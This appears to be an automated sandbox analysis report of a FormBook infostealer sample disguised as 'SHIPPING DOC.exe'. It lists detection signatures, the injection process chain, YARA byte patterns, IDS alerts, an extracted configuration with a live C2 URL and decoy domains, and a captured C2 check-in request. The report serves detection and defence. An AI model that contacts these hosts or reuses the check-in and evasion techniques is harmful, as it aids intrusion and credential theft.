Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SHIPPING DOC.exe

Overview

General Information

Sample name:SHIPPING DOC.exe
Analysis ID:1549885
MD5:f49a779c9194a3b100f591a333b608a6
SHA1:4141b908112fed259eca359c0d5be3be0bc8ba14
SHA256:51132cd1705668a4b8b716b3169779133de701532821ba4d9cbea174143fceb8
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SHIPPING DOC.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\SHIPPING DOC.exe" MD5: F49A779C9194A3B100F591A333B608A6)
    • svchost.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\SHIPPING DOC.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • colorcpl.exe (PID: 7980 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
        • cmd.exe (PID: 8008 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries
      SourceRuleDescriptionAuthorStrings
      6.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          6.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SHIPPING DOC.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC.exe, ParentProcessId: 7280, ParentProcessName: SHIPPING DOC.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC.exe", ProcessId: 7492, ProcessName: svchost.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SHIPPING DOC.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC.exe, ParentProcessId: 7280, ParentProcessName: SHIPPING DOC.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC.exe", ProcessId: 7492, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-06T08:06:18.555163+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749732TCP
          2024-11-06T08:06:58.008608+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749954TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-06T08:08:11.005774+010020314531Malware Command and Control Activity Detected192.168.2.74997150.28.1.5680TCP
          2024-11-06T08:10:36.345411+010020314531Malware Command and Control Activity Detected192.168.2.749972199.59.243.22780TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
          Source: SHIPPING DOC.exeVirustotal: Detection: 52%Perma Link
          Source: SHIPPING DOC.exeReversingLabs: Detection: 44%
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: SHIPPING DOC.exeJoe Sandbox ML: detected
          Source: SHIPPING DOC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: colorcpl.pdbGCTL source: svchost.exe, 00000006.00000003.1424656875.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1424638942.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425923732.0000000003980000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000003.1424418407.000000000301C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705450747.0000000000C40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: svchost.exe, 00000006.00000003.1424656875.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1424638942.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425923732.0000000003980000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000003.1424418407.000000000301C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 0000000B.00000002.3705450747.0000000000C40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOC.exe, 00000000.00000003.1270711708.0000000004060000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC.exe, 00000000.00000003.1271552278.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425398449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1272920309.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1271421810.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425398449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1425469673.0000000004402000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.0000000004760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1428133757.00000000045B1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOC.exe, 00000000.00000003.1270711708.0000000004060000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC.exe, 00000000.00000003.1271552278.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.1425398449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1272920309.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1271421810.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425398449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 0000000B.00000003.1425469673.0000000004402000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.0000000004760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1428133757.00000000045B1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000008.00000002.3724965131.00000000112BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3706706512.0000000004CAF000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3704373694.0000000000900000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000008.00000002.3724965131.00000000112BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3706706512.0000000004CAF000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3704373694.0000000000900000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49971 -> 50.28.1.56:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49971 -> 50.28.1.56:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49971 -> 50.28.1.56:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49972 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49972 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49972 -> 199.59.243.227:80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.28.1.56 80Jump to behavior
          Source: Malware configuration extractorURLs: www.9net88.net/ge07/
          Source: DNS query: www.onsfskfsmpfssfpewqdsawqe.xyz
          Source: DNS query: www.hemicans.xyz
          Source: DNS query: www.ivglass.xyz
          Source: DNS query: www.eries-htii.xyz
          Source: DNS query: www.isit-txax.xyz
          Source: unknownDNS traffic detected: query: www.ivglass.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.onsfskfsmpfssfpewqdsawqe.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.hemicans.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.epehr.pics replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.isit-txax.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ehkd.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.g18q11a.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.eries-htii.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ngeribe2.homes replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.amyard.shop replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /ge07/?KzrXZd=RnhvF69Eejdjh7LW/vVnUSwJbe8jMECevaaVozv0Nv6leJNRl1tdFOKkXLktzsH0v2W+gs0fFA==&n0G=AdhDQXr HTTP/1.1Host: www.croom.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49732
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49954
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
          Source: global trafficHTTP traffic detected: GET /ge07/?KzrXZd=RnhvF69Eejdjh7LW/vVnUSwJbe8jMECevaaVozv0Nv6leJNRl1tdFOKkXLktzsH0v2W+gs0fFA==&n0G=AdhDQXr HTTP/1.1Host: www.croom.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.onsfskfsmpfssfpewqdsawqe.xyz
          Source: global trafficDNS traffic detected: DNS query: www.g18q11a.top
          Source: global trafficDNS traffic detected: DNS query: www.ehkd.top
          Source: global trafficDNS traffic detected: DNS query: www.hemicans.xyz
          Source: global trafficDNS traffic detected: DNS query: www.croom.net
          Source: global trafficDNS traffic detected: DNS query: www.ngeribe2.homes
          Source: global trafficDNS traffic detected: DNS query: www.epehr.pics
          Source: global trafficDNS traffic detected: DNS query: www.amyard.shop
          Source: global trafficDNS traffic detected: DNS query: www.ivglass.xyz
          Source: global trafficDNS traffic detected: DNS query: www.eries-htii.xyz
          Source: global trafficDNS traffic detected: DNS query: www.isit-txax.xyz
          Source: global trafficDNS traffic detected: DNS query: www.9net88.net
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3709245546.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1277736211.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3078272472.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3709245546.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1277736211.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3078272472.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3709245546.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1277736211.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3078272472.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3709245546.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1277736211.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3078272472.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
